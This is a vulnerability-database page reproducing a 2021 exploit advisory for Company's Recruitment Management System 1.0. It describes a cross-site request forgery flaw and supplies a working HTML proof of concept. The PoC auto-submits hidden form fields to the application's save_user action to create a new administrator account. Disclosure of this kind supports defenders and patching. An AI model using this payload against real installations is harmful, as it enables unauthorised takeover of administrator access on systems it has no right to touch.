Lucene search
K

Company's Recruitment Management System 1.0 Cross Site Request Forgery

🗓️ 18 Oct 2021 00:00:00Reported by Aniket DeshmaneType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 322 Views

Company's Recruitment Management System 1.0 CSRF vulnerabilit

Code
`# Exploit Title: Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)  
# Date: 18-10-2021  
# Exploit Author: Aniket Anil Deshmane  
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip  
# Version: 1  
# Tested on: Windows 10,XAMPP  
  
Detail:  
The application is not using any security token to prevent it against CSRF. Therefore, malicious user can add new administrator user account by using a crafted post request.  
  
CSRF POC:-  
  
  
<html>  
<!-- CSRF PoC - generated by Burp Suite Professional -->  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://127.0.0.1/employment_application/Actions.php?a=save_user"  
method="POST">  
<input type="hidden" name="id" value="" />  
<input type="hidden" name="fullname" value="Test" />  
<input type="hidden" name="username" value="Test" />  
<input type="hidden" name="type" value="1" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Oct 2021 00:00Current
0.2Low risk
Vulners AI Score0.2
322